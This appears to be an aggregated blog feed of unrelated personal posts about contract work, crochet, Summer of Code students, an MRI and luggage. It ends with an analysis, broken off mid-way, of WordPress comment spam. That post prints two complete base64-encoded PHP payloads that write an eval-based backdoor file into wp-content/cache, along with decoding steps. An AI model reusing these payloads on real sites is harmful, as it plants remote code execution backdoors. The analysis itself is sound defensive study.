For the last eight years, I have worked as a freelance programmer on a product that is currently known, by the few who know it at all, as PVS.  I started with the product when it was the up-and-coming, eponymyous product of a software company named Ardence, run by my friend Richard Davis.  When Ardence was acquired by Citrix Systems in 2007, my contract was picked up along with the code.

Through four major product releases, I’ve been a remote member of a team that slowly nudged the product’s code up the scalable, enterprise-ready evolutionary ladder: from single-threaded to multi-threaded, from Access to Sql Server, and from being a stand-alone product to being a component integrated within other, larger Citrix offerings, which is how a product that is used by many is known by name to so few.

The amount of work varied from quarter to quarter but averaged 20-30 hours a week. For all these years, my Citrix hours have been the big rock that had to fit first into every day and that any other work had to fit around.  My Citrix contract has been ‘the day job,’ funding and enabling all the investment in our app product portfolio.

But as of Friday, May 31st, my last work order expired, I emailed my goodbyes, and I turned out the lights on all my remote connections to Citrix machines real and virtual.  I may need to go back to consulting to make ends meet, but not right away, and definitely not for a few months.  I’ve promised myself at least one full-time Summer of Product.  And, tempered with an appropriate amount of trepidation, I am really, really looking forward to the experience.

Citrix could not have picked a better time, from my perspective, to rationalize the resources being applied to PVS.  I frankly don’t know if I would have had the courage to jump ship right this minute but I am extremely grateful for the push.

I have a small but remarkable collection of people working with me, an existing set of products whose potential we are only starting to understand, some new product just coming out the door that I believe has real promise, and some new ideas for other, more ambitious products that we may work on in the near future.

The trick for me is, without my Citrix work to anchor my days, finding a way to avoid the entrepreneur’s version of whirling disease– spinning in place all day trying to get started on one good idea after another and never making tangible progress on anything.

So the time also seems right to try a version of the Zig Ziglar / Seth Godin Pick Four  goal setting program.  I bought one of the set-of-four workbook packs when Godin first brought them out, two summers ago, but only got as far as making my dreamlist and reviewing/updating it from time to time.  I never bothered to go through the actual goal setting exercise because I never saw a good time to kick off the four month recommended interval.  Now’s perfect.  I’m in more control of my own daily agenda than I have been in years and I’ve got the resources available to take the four months from June 1 to October 1 and see what I can do with them.

I’ve set five goals (Godin says to pick four.  Ziglar’s original program recommended picking six.). Three are purely personal, not professional, so I’ll note them here but expect to leave them largely off-screen for the duration.

The two that I plan to be writing about from time to time and sharing my progress reports are:

• Maximize distribution of the ERG2012QL ebook and its Spanish- and French-language siblings.   Use that exercise to increase my understanding of:
  • The current adoption rate of ebooks among North American ‘first responders’ — which in my view includes firefighters and EMTs, of course, but also truck drivers.  Are ebooks a reasonable, platform-independent way to deliver functionality to this market or is this market, which is increasingly using mobile devices, reachable only via platform-specific apps?
  • (Maybe) Identify one or more non-ebook market opportunities.  Yes, I am trolling for a Software-as-a-service (SAAS) subscription product idea.
  • The current state of the art in producing and marketing reference ebooks — which are technically quite a bit more challenging to produce than, say, novels.
• Establish a writing habit and my own (internal and external) identity as a writer (aka blogger).  I do believe that writing can be both an effective research tool and a valuable marketing channel if done consistently and well.  It also appears, for me, on the path to a few different items on my dream list.

The personal three are all pretty predictable for a woman of my age and circumstances. I’m planning on taking a walking tour vacation in Spain with my husband and a couple of close friends in the middle of September. I probably work too many hours and need to get back to having a bit more of a life.  Without any of specifics, they are:

• Get more fit.
• Practice my ‘hearing Spanish’ — that is, understanding spoken, not written, Spanish.
• Work on connecting more with family and friends.

My biggest concern at this point is that I don’t think I’ve done a great job of setting specific, measurable targets for my professional goals.  And, frankly, it’s my one complaint about the Pick Four workbook: not nearly enough guidance on how ambitious or specific to be on the goals themselves.

I did do my homework and read the recommended scholarly paper:  Building a Practically Useful Theory of Goal Setting and Task Motivation: A 35-Year Odyssey . It’s fairly dense and full of psych-speak but here’s what I got out of it that I think is useful to me:

• In general, learning-oriented goals seem to work better than performance-oriented goals.  The example in the paper was that it was more effective to challenge log-truck drivers to figure out for themselves how to increase their load weights to be consistently just within the legal limit than it was to tell them to increase their average load weight to xxx pounds.  I like this approach. Whatever my job title, it seems to me that I’ve always learned for a living so I think that setting learning goals should work for me.
• Ambitious goals work better than easy goals, but only if you get (or give yourself) partial credit for incremental progress.  High stakes, all-or-nothing goals can be remarkably dis-incenting, especially as the period for accomplishing them wears on, if progress is slow and it looks as if you are not going to make your target.  I did pretty well in college getting by on partial credit, so this makes sense to me.  My current situation IS high stakes — I really want to get enough product revenue coming in that I don’t have to go back to long-term consulting myself — but there is a lot of wiggle room for partial triumphs and occasional small consulting gigs.

I honestly think my work life is too complicated and my situation too fluid to try to set myself a rigid goal like Nathan Barry’s 1000 words a day. As a manager, I owe a lot of my workday to the folks who work with me and to what we are trying to accomplish together.  But I know that the writing goal as stated above is way too vague to be actionable.  So one of my interim goals, for the month of June, say, is to settle on a more concrete, ambitious, but achievable expressions of my goals. Maybe something like: one decent-sized blog post, written primarily by me, each week.

I’m already 13 days into June.  Here’s #1.

This is crossposted from Curiousity.ca, my personal maker blog. If you want to link to this post, please use the original link since the formatting there is usually better.

Last year at Pycon, I made a bunch of teensy amigurumi penguins to give to the friends who were sprinting on GNU Mailman with me. (Small round penguin ball pattern here) Florian commented some time later that he nearly didn’t get to keep his, as his wife is a huge fan of penguins, so since he had a new baby at home by the time of the next PyCon, I figured I knew what I should be doing: making a small pile of penguins for his family.

The emphasis was indeed on small since Florian would have to fit them in his suitcase for an international flight but not too small, since they were sort of intended as baby toys. Below you can see a size comparison of the largest one (in proto-penguin form) with a spatula (made unintentionally hilarious later on when the spatula was discovered lying on a pillow in the spare bedroom and questions were asked).

And here’s the smallest one, with my hand for size. It may help you to know that my hands are fairly small — I can just barely play a full-sized violin and would probably be more comfortable on a 3/4. (Well, okay, I haven’t actually played the violin in years, but the point is that I have almost child-sized hands.)

The patterns

The big round penguin

Amigurumi Penguin by Lion Brand Yarn. I’d made this pattern before, and it’s actually what inspired my small penguin balls from last year. It’s a very easy pattern for beginner crocheters, and you can get a fair bit of expression out of adjusting the penguin’s beak and wings.

The tall penguin

Penguin Amigurumi by Tamie Oldridge. This one’s especially fun because he has a little separate hood that you place over the top ball (hence the bowling-pin shaped proto-penguin in the photo with the spatula).

The pink penguin

Amigurumi Penguin Cell Phone Strap by Pierrot (Gosyo Co., Ltd). As you can tell from the title, this one was meant to be made with smaller yarn or cotton thread, but I scaled up so it wouldn’t be a choking hazard. People were so entertained by this one that I made a few more at the conference and gave them away too.

Here’s two pictures of one of those little wool penguins, before and after felting, with my apple power connector, watch and ring for size comparison. You can see that it didn’t get that much smaller but it definitely gets fluffier with the hand felting.

The yarns used for that one were Knit Picks palette yarns, which is one of my staples for travel since I can take small balls and a handful of stuffing and still make cute things. (If you ever feel a need to buy me hundreds of dollars of wool, you can buy a sampler pack with all the colours. I’d use them, promise!)

The felting was done by hand in the hotel using hot water from the coffee pot, a mug and shampoo from those teensy little hotel bottles. Who knew hotels contained everything you needed for hand felting? Heat water without any coffee in the machine, pour a few drops of shampoo on the penguin, dip it in the hot water, roll it around in your hands or scrub at it, rinse, repeat, replacing the water if it gets cold or too soapy.

Finally, here’s one more picture of the big pink penguin hanging out on my windowsill in Albuquerque:

comments

One of the things that Python asks of all students under our "umbrella" is that they blog regularly about their projects. This helps me keep track of how all the students are doing, and helps advertise the interesting work they'll be doing to a larger community. I've set up a blog aggregator here for Python's Summer of Code Updates and you can see that folk are already talking about their projects as they settle in.

Coding starts June 17th. Here's to a great summer!

comments

The Python Software Foundation has 36 Google Summer of Code students starting next week!

If you'd like to learn more about any of the student projects as they were proposed, you can also see the list and descriptions on the GSoC Website. But here's a list, grouped by project:


Core Python
Phil Webster, IDLE Improvements
Jayakrishnan Rajagopalasarma, IDLE Improvements




ASCEND
Ksenija Bestuzheva, ASCEND: dynamic modelling improvements
Pallav Tinna, Porting to gtk3 and GUI improvements




Astropy
Madhura Parikh, Astropy: Develop the Astroquery toolkit into a coherent package
Axel Donath, AstroPy: Extending the functionality of the photutils package.



GNU Mailman
Manish Gill, Mailman: Authenticated REST-API in Postorius/Django.
Abhilash Raj, GNU Mailman - Integration of OpenPGP




Kivy
Abhinav, Kivy: Kivy Designer
Ivan Pusic, PyOBJus



MNE-Python
Mainak Jas, Real-time Machine Learning for MEG in MNE-Python
Roman Goj, MNE-Python: Implement time-frequency beamformers




OpenHatch
David Lu, Data Driven Mentorship App
Tarashish Mishra, OpenHatch: Rewrite training missions using oppia (Training missions, version 2)



PyDy
Tarun Gaba, PyDy: Visualization of the simulated motion of multibody systems
Tyler Wade, wxPython Bindings for PyPy using CFFI




PyPy
Manuel Jacob, Implementing Python 3.3 features for PyPy




Pyramid
Andraž Brodnik, Better Debug tools
Domen Kožar, Substance D improvements




PySoy
Juhani Åhman, PySoy: Improve Android and HTML5 Soy clients




Scikit-Image
Chintak Sheth, scikit-image: Image Inpainting for Restoration
Marc de Klerk, scikit-image: Segmentation Algorithms as a basis for an OpenCL feasible study
Ankit Agrawal, scikit-image : Implementation of STAR and Binary Feature Detectors and Descriptors



Scikit-learn
Kemal Eren, scikit-learn: Biclustering algorithms, scoring, and data generation
Nicolas Trésegnie, Scikit-learn : online low rank matrix completion


SciPy
Surya Kasturi, SciPy: Improving functionality and Maintainability of SciPy Central
Arink Verma, SciPy/NumPy : Performance parity between numpy arrays and Python scalars
Blake Griffith, Improvements to the sparse package of Scipy: support for bool dtype and better interaction with NumPy




SfePy
Ankit Mahato, SfePy: Enhancing the solver to simulate solid-liquid phase change phenomenon in convective-diffusive situations


Statsmodels
Ana Martínez Pardo, Statsmodels: Discrete choice models
Chad Fulton, Statsmodels: Time Series Analysis Extensions (esp. regime-switching models)


SunPy
Michael J. Malocha, SunPy - Interfacing with Heliocphysics Databases
Simon Liedtke, SunPy: Database of local data



Tahoe-LAFS
Mark Berger, Upload Strategy of Happiness in Tahoe-LAFS


Twisted
Shiyao Ma,Twisted: Switching to Formal Parsers
Kai Zhang,Twisted: Deferred Cancellation

We had a great number of talented applicants and I only wish we'd been able to take more of them. Congratulations to those accepted and to the rest of you, I hope you'll apply again next year!

comments

The MRI was unintentionally hilarious. I'd just gotten moved into my magical science magneto-coffin and told I couldn't move anymore then what comes on the headphones but spirit in the sky.

"When I die and they lay me to rest
Gonna go to the place that's the best"

Oy, it was hard not to laugh to that while lying still on a slab holding my emergency "get me out of here" button. (which isn't a button so much as an old-school camera bulb!)

Anyhow, other than that it was loud (as expected) but not as boring as I'd thought it would be because the noises it makes change often enough to keep me thinking about what might be going on in there, and honestly, just staying still for 20 minutes takes a fair bit of concentration for me. Plus I had the headphones and 70's rock to keep me amused (that was my choice and *clearly* it was the right one). Sometimes I had to just focus on the cowbell to stay still, because apparently that is how I work. The headphones are kind of cool -- rather than wires, they've got tubes filled with music and occasional instructions from the radiologist.

I won't have results 'till sometime next week; I presume the doctor will phone me like she did last time. I'm hoping I can get copies of the MRI and Xrays so I can see my innards, 'cause how cool would that be?

A twitter friend suggested I should make a list of #innappropriateMRIsongs, so in that vein, I give you Mystery and Crime:

Oh no, what have I done?
Oh no, what have I done?
I've got a pain in my heart
A beat that's as loud as a drum
Now, now what do I do?
Now, now what do I do?
You got to get me out of here
Before these brand new clothes aren't new anymore

And that's not even getting to the murder murder murder part that's the usual reason this is a totally inappropriate song for all occasions. (I once had to stop myself from singing it in an airport...)

I dare you all to think of more inappropriate MRI songs, but I'm going to bed!

comments

The thing with steam sales is that while the game itself may be $5, my penchant for buying copies for everyone who I might want to play with adds up... to another $20.

Okay, I guess I can live with that. ;) It's awesome being an adult with disposable income to spare!

The game in question was, incidentally, a Dungeon Siege pack (It's on sale for another 15 mins or so). My sister and I enjoyed the first two games in part because if you set yourself to follow another player, it treated you as a minion and basically played the game for you. Many people thought this was a bad thing, but Susan and I thought it was awfully convenient for the purpose of getting a cookie. The 3rd game got such terrible reviews that we never bought it, but... $5! For all 3 plus an expansion! Even if it just saves me finding the discs for my copies of the 1st two games, I'm willing to pay that. And let's be honest, we even kind of thought the dubious Dungeon Siege movie was fun, so we'll get $5 worth of enjoyment out #3 of this one way or another.

comments

So I get through most of the hoops and get an itinerary for this job interview... followed 10 minutes later by an email from the travel scheduler going "wait, don't book that! we need to change dates!"

Oh well, at least it happened before the flights were booked!

comments

This is crossposted from Curiousity.ca, my personal maker blog. If you want to link to this post, please use the original link since the formatting there is usually better.

This little leafy sweater is a present for Baby O’Byrne, whose name is a secret until she makes it out into the world. She was due a few days ago as I’m writing this; I’m just waiting for the announcement of her arrival! I’ve scheduled this post to go up on May 31st, and we’ll see if she comes out before it does.

I’ve been friends with Baby O’Byrne’s dad for a long time, so this sweater was made with him in mind. Ken and I have spent a great many hours hiking and camping together, so I had bought some variagated green yarn and when I saw this pattern in a book at the library, I figured I had a match.

The little details of the pattern are what drew me in. I really like the leafy motif and the little seed-stitch edging is not only cute, but keeps the piece from curling up too much at the edges. Clever! And speaking of details, aren’t those buttons adorable? I bought them originally for a project of my own and had enough left over for the sweater. Here’s a close up:

This isn’t the only piece I’ve made for her, but I forgot to take photos before packaging the rest up in time for the baby shower. (This one wasn’t ready in time so got sent later.) Oops! Her dad has a new camera, though, so maybe he’ll have time to take pictures of her wearing the two hats and two sets of booties I sent along before this sweater was finished. We’ll see how co-operative she is, though!

The Pattern:

Autumn Leaves by Nikki Van De Car from “What to Knit When You’re Expecting.” I really liked the book and will probably be buying my own copy rather than monopolize the library one again!

comments

This is crossposted from Curiousity.ca, my personal maker blog. If you want to link to this post, please use the original link since the formatting there is usually better.

Today’s project does double-duty as both a knitting project and a photo assignment: a knitted finger moustache and a self portrait for Active Assignment Weekly.

Taken for AAW: 20 - 27 May: You look Marvelous (and Ravelry)

I found this project on Ravelry late one evening when I was trying to find errata for another pattern which was totally not working for me, and this seemed like the perfect antidote to the frustration. I was debating doing some photos with some inanimate objects like the link above shows, but I happened to check AAW and noticed today’s deadline hadn’t on the self-portrait assignment for this week hit yet, so… self-portrait time!

This being a self portrait assignment that I had an hour and a half to shoot, process and submit, it’s sans-makeup or even a hairbrush. That’s pretty much me on a lazy holiday Monday anyhow — silly knitting project, a camera, a book, and a computer.

What it took (photo-wise):

These are pretty much straight out of camera aside from stitching them together for a triptych, although I admit to photoshopping the scratch on my forehead and removing a stray hair that looked weird. I didn’t plan for a triptych or the eye thing, these just happened to be among the best of my “let’s goof off with my silly knitting project in front of my camera with a remote” shots.

Things I learned:

- Putting all the photos on one layer, moving them around, then doing image->reveal all in photoshop makes triptyches *waaaay* easier. No more figuring out canvas size!

- you can resize just one layer by using ^T in photoshop, just don’t forget to tell it when you’re done or it acts all locked.

The knitting pattern:

It’s a moustache, for your fingers! by Megan Death (It’s free!)

comments

When Does Plastic Surgery Become Racial Transformation?

This article, about a young man who underwent surgery to look less Asian, is kind of fascinating. For one, I'm not sure what I was thinking he'd look like, but seeing the pictures my first thought was "actually, he looks kind of bi-racial." But also it's interesting to me because I've been told many times since moving here that I don't look that Asian, and it's weird watching people react when I say "that was intentional." (I switched to a different haircut and found I was having less trouble with racist jerks, so I keep getting similar haircuts; I still am pretty clear about my bi-raciality when it comes up.) I scanned the comments and they're all about how sad it is, but do people think that about hair dye? Cosmetics? My hair cut? Weight loss? I don't know that I find it that sad; it's kind of neat that he figured out what would make him happier in his own skin and was able to afford it, and he seems pretty honest with himself about why he's doing it.

And... I don't know, I have some complex thoughts about the whole thing but I just wanted to post the link even though I don't feel like writing an essay to go with it.

comments

Luggage with a built-in scooter is awesome. I've seen ride-on wheeled luggage for kids (and coveted it mightily), and this appears to be the adult-friendly equivalent. Sadly, does not meet a lot of my other criteria (I'd be shocked if they let me avoid gatechecking this) and it's $250 (But at least shipping is free...). I'm tempted just for the awesome factor.


Here's a small hard case that meets a lot more of my criteria. It clocks in at 35cmx39cmx23cm (that's 14"x15"x9" for those of us who have to fly in America) and comes in cheerful colours. I'm actually not sure which one I'd choose -- normally I shun the pinks but that dark one is pretty lovely and would fit nicely into some sort of business-travelling fashionista persona if I dressed the part with some business casuals. But maybe the green or red would be less likely to clash with my existing wardrobe.... Honestly, I'm approaching this project much like I do cosplay, and now that I think about it it's not really that different: I'm playing for an audience to believe me to be someone very specific. Nevermind that I'm still projecting a variant on me; it's all the same body language, fashion, and carefully chosen accessories that make it work.

Similarly, a bright orange gem that could probably work with the persona too. 36x44x20cm (14x17x8") for that one, and only two wheels tucked into the edges so probably a bit more packing space in the final tally.

But despite the obvious appeal for my in-progress traveler persona, I'm not seeing any useful way for me to get reviews of these that I can actually understand since they're shipping from Hong Kong, and I haven't quite decided if I really should be making a hundred dollar gamble just because the colours are fun. I wonder if it's possible to find something similar that's at least a little more local to me? I have learned the useful new search terms "rolling business case" but it's mostly been turning up uninspired blackness.


Incidentally, I *did* check the wirecutter and they do have a section on bags, just not the kind I'm looking for. Bags are one of those few things I'm exceptionally picky about (especially right now while mildly injured, but even when not I tend to have precise requirements) so it probably isn't that much of a loss. They're apparently looking for a freelance bag editor and I rather wish I were actually the right person for that job. Lot of work for little pay, but a chance to try lots of bags!

comments

I currently own a 20" rolling carry-on bag that has met my airline & train travel needs for years (I switched to it a year or two before airlines started charging for checked bags), and it's perfect for a week-long conference where I'm coming back or going out with a lot of stuff, or when I'm visiting my parents for close to a month at Christmas, but it seems excessive when I'm going for a weekend trip or a job interview.

I'm considering getting a smaller suitcase for those shorter trips, so I'm working out my requirements. This thread covers more or less what I have in mind, but here's some personal preference/requirement notes:

1. Must have wheels. I used to do backpack+purse for shorter trips, but I've been finding that I often pinch a nerve during travel and I'm pretty sure carrying my camera/laptop on my back is a factor.

2. Can fit my laptop and possibly SLR camera + 2-3 days worth of clothes. Thankfully my clothes are pretty small. Camera may be optional: I'm trying a downgrade to a point and shoot for short trips.

3. Preferably I'd like something that can fit into the overhead bin on the smaller regional jets, since often my flight will have one hop with those. A search says that this means the bag will have to be around 18Lx14Wx7D. Sounds like you can fit larger, but I'd rather not have to argue it out with the gate staff / flight attendant every time. I am perfectly ok with being given a checked tag and then "obliviously" carrying my bag on the plane anyhow as long as it will fit, though.

4. Butnot arguing with the gate/flight staff every time I fly would be awesome. This may mean going with something more backpack-like so I can just put it on my back when I walk on the plane, but mostly it just reinforces "small" and "looks like it holds a laptop." Briefcases should work.

5. Should have an open clothing section as opposed to a bunch of filefolder divider things that will make it harder to pack.

6. Should open fully, at least for the clothing section. Pure preference on my part.

7. I'm not too picky about laptop sleeves, although something I can easily slip a laptop out of for the TSA or in case I do have to check the bag is good. I basically never use my laptop on the plane, I just don't want to skycheck it.

8. If at all possible, not black. Something like 90% of the suitcases I see are black and I don't want to be worrying about someone grabbing mine by mistake.

9. But (and i realize this may contradict the "not black" thing) something that looks more business traveller-y would be good. I have a *lot* of trouble with TSA reps assuming I'm young or an infrequent traveler which is especially frustrating when I go somewhere with J and they immediately assume he's an expert while I get the "oh, hon, you know our machines are perfectly safe?" talk-down-to-the-little-girl spiel. (My new response: "My sister is a physicist who works in health and safety; I'd like to opt out." which is factually true but irrelevant and calculated to throw them and possibly nearby travelers out of their default headspace without getting into an argument.)




I've been finding that
(a) A disturbing number of online sites don't give pictures of the inside of the bags.
(b) A disturbing number of online sites don't give dimensions or even pictures that could help me guess the dimensions
(c) Bags are expensive (duh)
(d) There is an entire market for "women's suitcases" which I find somewhat strange. Particularly given that the "women's briefcase-bags" seem pretty much identical to the non-women's ones.



I don't have any short trips scheduled, but I'm hoping to find some bag options I like and catch a sale (luggage goes on sale quite frequently, so it's a bit ridiculous to pay full price if I've got time to spare).

I would love to hear first hand testimonials from any of you who travel with a bag that might meet my needs, though. It was a recommendation from Linuxchix that drew me to my current bag which has done me pretty well although it's starting to show its age now.

comments

WARNING: This entry contains some actual malicious code. I've HTML-escaped it so that it isn't going to get executed by you viewing it, but it was clearly intended to attack Wordpress blogs, so if you're going to mess around with analyzing, do it in a browser that's not logged in to any Wordpress blog.


So I was clearing spam queues this morning, and came across a bunch of spam with this string in it:


eval(base64_decode(‘aWYoJGY9Zm9wZW4oJ3dwLWNvbnRlbnQvY2FjaGUvaWZvb2FnLnBocCcsJ3cnKSl7ZnB1dHMoJGYsJzw/cGhwIC8qTiVQYCUqL2V2YWwvKklmXCcsLSovKC8qPjZgSGUqL2Jhc2U2NF9kZWNvZGUvKkBNKTIqLygvKn46SDUqL1wnTHlwM1kyQTdjQ292YVdZdktuY2hibHNxTHlndktsNXpXeUZVY25CUktpOXBjM05sZEM4cVVFZzBPWHhBS2k4b0x5cDRZR3BXS1U0cUx5UmZVa1ZSVlVWVFZDOHFjaUI0S2k5Ykx5b29mbEZ4S2k4bll5Y3ZLakUvUUdWMFd5b3ZMaThcJy8qT3pNNTIwKi8uLyo5SissKi9cJ3FQU3dwS2k4bmVpY3ZLblZVUVRrektpOHVMeXBEZTBjNlFEUmNLaThuYkNjdktqaDBJRzhxTHk0dkttMTVUVDA4UkdBcUx5ZDZKeThxZUdkbk1YWTJNU292TGk4cVZuQkpaelFxTHlkNUp5OHFaWHhxZVVFcUx5NHZLaXgyS0NvdkoyXCcvKnlBdCYqLy4vKkA1RHcmXU4qL1wnd25MeXBHTFZGdlREUXFMMTB2S21KaGEwMHBLaTh2S2x3N2MyNHFMeWt2S2s1M1Mwa25YeW92THlwUFgyc3FMeWt2S2toQVlVczBWQ292WlhaaGJDOHFNazU4TWpBK0tpOG9MeXBWYzBodFdWMWxXaW92YzNSeWFYQnpiR0Z6YUdWekxcJy8qWWFiayovLi8qT35xcyovXCd5bzhTR2N6S2k4b0x5cFZRVXRoWmlvdkpGOVNSVkZWUlZOVUx5cFdMa3RVSUhzcUwxc3ZLa3N0TG1NcUx5ZGpKeThxU0c5b0tpOHVMeXBZVGp0SEtpOG5laWN2S2pzbU15Z3lNV1FtWFNvdkxpOHFPMUJQZFNvdkoyd25MeXBaV1ZBelwnLyp7WUp9MSovLi8qdisoLTtrKi9cJ2VuVXFMeTR2S2xWc2FWVXRLaThuZW5sc0p5OHFSbFJaWERRcUwxMHZLazQvVW1JK0syWXFMeThxU3l0TFF5b3ZLUzhxYkVCcUtpOHZLbUpZUENvdktTOHFPbG8yVlVVb1NrSTRLaTh2S2tKWFp6dEFTeW92T3k4cVJUc3JkaWRKS2k4PVwnLyooa0NwQFk+Ki8pLypgYmMqLy8qSHZeISovKS8qV21GKi8vKlBfV2VgYD57Ki87LyotfGxURTEqLz8+Jyk7ZmNsb3NlKCRmKTt9′));


Or this clearly related one (note that the top of the string is the same):

aWYoJGY9Zm9wZW4oJ3dwLWNvbnRlbnQvY2FjaGUvaWZvb2FnLnBocCcsJ3cnKSl7ZnB1dHMoJGYsJzw/cGhwIC8qcGshV1UqL2V2YWwvKnpDRnI4ejQqLygvKi1mJWYmZyovYmFzZTY0X2RlY29kZS8qY2hIIG0qLygvKnZXXnEqL1wnTHlvL05tcHlLaTlwWmk4cU9ENUpUM2NxTHlndktsdHZLU292YVhOelpYUXZLa2M2WTNRcUx5Z3ZLaUZQWERrcUx5UmZVa1ZSVlVWVFZDOHFjU3R5S1RGNklDb3ZXeThxV0RkblNDb3ZcJy8qd0VEJSovLi8qWnA2OnIqL1wnSjJNbkx5b2hSU0VxTHk0dktrZEVSU3RrS2k4bmVpY3ZLa2NyUUVZd09Db3ZMaThxUFU5RUxqQTZUaW92SjJ3bkx5cDhkRE14UkNvdkxpOHFLVFIwT2xoc2MyZ3FMeWQ2ZVd3bkx5cFRcJy8qQ01MRzEqLy4vKmlUeVUwflAqL1wnVFZBdFFTb3ZYUzhxSnpaUFR5MHFMeThxVFZOYlpDb3ZLUzhxWEU1TU1Tb3ZMeXB1SjFzcUx5a3ZLaVZ5Y0N4aEtpOWxkbUZzTHlwTkxseHBLaThvTHlwdFVtNDFJSGxTS2k5emRISnBcJy8qXXgyZCovLi8qIG5SKi9cJ2NITnNZWE5vWlhNdktrbytiRGhrS2k4b0x5bzFOa3hZVTB0Z1RTb3ZKRjlTUlZGVlJWTlVMeXBPWGt0YVF6d3FMMXN2S201TWNrWXpjeUFxTHlkakp5OHFiQ3RLY2lvdkxpOHFUUzFuXCcvKmhccGhpKi8uLypjVz4qL1wnS2k4bmVpY3ZLaUZGTmlvdkxpOHFVeWRLUVNvdkoyd25MeXB1S1ZWQUxpb3ZMaThxYkZoV1BEOW9aU292SjNvbkx5cFZJRk1xTHk0dktqRkFlME1zS2k4bmVTY3ZLajk4V3lvdkxpOHFcJy8qPE9rNXBmKi8uLyo0VlhFKi9cJ1VtODJVeW92SjJ3bkx5cFZURm9xTDEwdktpWjNOQ292THlvL0xXWjVLaThwTHlvL01URXFMeThxSjN4ZlFTb3ZLUzhxT2psSlRGSXFMeThxYjBNeFFTY3JKU292T3k4cWVWbzVUeW92XCcvKiAzXCcqLykvKlpsWyUqLy8qLVRPJUdiNiovKS8qUyw3bjRTLCovLypCQ1sqLzsvKkxacHM8blNaKi8/PicpO2ZjbG9zZSgkZik7fQ==


As you can tell from the first sample, it's base64 encoded... something. b64 is pretty commonly used by attackers to obfuscate their code, so in case the spammy username and comment that went with the code wasn't enough to tell me that something bad was intended, the b64 encoding itself would have been a clue. If I didn't have the pretty huge hint of the base64_decode line, I might have been able to figure it out from the format and the fact that I know that b64 uses = as a padding (visible at the end of the second string).

Being a curious sort of person, I decoded the first string. In my case, I just opened up Python, and did this:


>>> import base64
>>> base64.b64decode(badstring1)
"if($f=fopen('wp-content/cache/ifooag.php','w')){fputs($f,'<?php /*N%P`%*/eval/*If\\',-*/(/*>6`He*/base64_decode/*@M)2*/(/*~:H5*/\\'Lyp3Y2A7cCovaWYvKnchblsqLygvKl5zWyFUcnBRKi9pc3NldC8qUEg0OXxAKi8oLyp4YGpWKU4qLyRfUkVRVUVTVC8qciB4Ki9bLyooflFxKi8nYycvKjE/QGV0WyovLi8\\'/*OzM520*/./*9J+,*/\\'qPSwpKi8neicvKnVUQTkzKi8uLypDe0c6QDRcKi8nbCcvKjh0IG8qLy4vKm15TT08RGAqLyd6Jy8qeGdnMXY2MSovLi8qVnBJZzQqLyd5Jy8qZXxqeUEqLy4vKix2KCovJ2\\'/*yAt&*/./*@5Dw&]N*/\\'wnLypGLVFvTDQqL10vKmJha00pKi8vKlw7c24qLykvKk53S0knXyovLypPX2sqLykvKkhAYUs0VCovZXZhbC8qMk58MjA+Ki8oLypVc0htWV1lWiovc3RyaXBzbGFzaGVzL\\'/*Yabk*/./*O~qs*/\\'yo8SGczKi8oLypVQUthZiovJF9SRVFVRVNULypWLktUIHsqL1svKkstLmMqLydjJy8qSG9oKi8uLypYTjtHKi8neicvKjsmMygyMWQmXSovLi8qO1BPdSovJ2wnLypZWVAz\\'/*{YJ}1*/./*v+(-;k*/\\'enUqLy4vKlVsaVUtKi8nenlsJy8qRlRZXDQqL10vKk4/UmI+K2YqLy8qSytLQyovKS8qbEBqKi8vKmJYPCovKS8qOlo2VUUoSkI4Ki8vKkJXZztASyovOy8qRTsrdidJKi8=\\'/*(kCp@Y>*/)/*`bc*//*Hv^!*/)/*WmF*//*P_We``>{*/;/*-|lTE1*/?>');fclose($f);}"


(Well, okay, I actually ran cgi.escape(base64.b64decode(badstring1)) to get the version you're seeing in this blog post since I wanted to make sure none of that was executed in your browser, but that's not relevant to the code analysis, just useful if you're talking about code on the internet)

So that still looks pretty obfuscated, and even more full of base64 (yo, I heard you like base64 so I put some base64 in your base64). But we've learned a new thing: the code is trying to open up a file in the wordpress cache called ifooag.php, under wp-content which is a directory wordpress needs to have write access to. I did a quick web search, and found a bunch of spam, so my bet is that they're opening a new file rather than modifying an existing one. And we can tell that they're trying to put some php into that file because of the <?php and ?> which are character sequences that tell the server to run some php code.

But that code? Still looks pretty much like gobbledegook.

If you know a bit about php, you'll know that it accepts c-style comments delineated by /* and */, so we can remove those from the php code to get something a bit easier to parse:


eval(base64_decode(\\'Lyp3Y2A7cCovaWYvKnchblsqLygvKl5zWyFUcnBRKi9pc3NldC8qUEg0OXxAKi8oLyp4YGpWKU4qLyRfUkVRVUVTVC8qciB4Ki9bLyooflFxKi8nYycvKjE/QGV0WyovLi8\\'.\\'qPSwpKi8neicvKnVUQTkzKi8uLypDe0c6QDRcKi8nbCcvKjh0IG8qLy4vKm15TT08RGAqLyd6Jy8qeGdnMXY2MSovLi8qVnBJZzQqLyd5Jy8qZXxqeUEqLy4vKix2KCovJ2\\'.\\'wnLypGLVFvTDQqL10vKmJha00pKi8vKlw7c24qLykvKk53S0knXyovLypPX2sqLykvKkhAYUs0VCovZXZhbC8qMk58MjA+Ki8oLypVc0htWV1lWiovc3RyaXBzbGFzaGVzL\\'.\\'yo8SGczKi8oLypVQUthZiovJF9SRVFVRVNULypWLktUIHsqL1svKkstLmMqLydjJy8qSG9oKi8uLypYTjtHKi8neicvKjsmMygyMWQmXSovLi8qO1BPdSovJ2wnLypZWVAz\\'.\\'enUqLy4vKlVsaVUtKi8nenlsJy8qRlRZXDQqL10vKk4/UmI+K2YqLy8qSytLQyovKS8qbEBqKi8vKmJYPCovKS8qOlo2VUUoSkI4Ki8vKkJXZztASyovOy8qRTsrdidJKi8=\\'));


Feel like we're going in circles? Yup, that's another base64 encoded string. So let's take out the quotes and the concatenations to see what that is:


